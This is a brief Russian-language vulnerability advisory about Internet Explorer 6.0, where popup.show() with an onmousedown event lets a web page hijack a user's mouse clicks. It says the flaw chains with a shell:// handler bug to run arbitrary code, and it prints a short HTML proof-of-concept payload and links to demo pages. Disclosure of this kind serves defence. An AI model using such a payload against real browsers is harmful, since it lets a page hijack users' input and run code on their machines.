Программа: Microsoft Internet Explorer 6.0 

Уязвимость обнаружена в Microsoft Internet Explorer в popup.show(). Удаленный пользователь может выполнить произвольные действия мышки на целевой системе.
Удаленный пользователь может создать HMTL, который использует функцию popup.show() с ‘on mousedown’ событием, чтобы выполнить различные действия мышки на целевой системе пользователя. 

Пример: 

http://freehost07.websamba.com/greyhats/hijackclick3.htm

Эта уязвимая функция может использоваться вместе с уязвимостью в «shell://» обработчике, чтобы выполнить произвольный код на целевой системе пользователя. Пример: 

<img src="greyhat.html" id=anch onmousedown="parent.nsc.style.width=2000;
parent.nsc.style.height=2000; parent.pop.show(1,1,1,1); parent.setTimeout(‘showalert()’,3000);
" style="width=168px;height=152px; background-image:url (‘youlickit.gif’);cursor:hand"
title="click me!"></a> location="shell:favorites\\greyhat[1].htm"

Пример:

http://www.malware.com/paul.html

 

Оставить мнение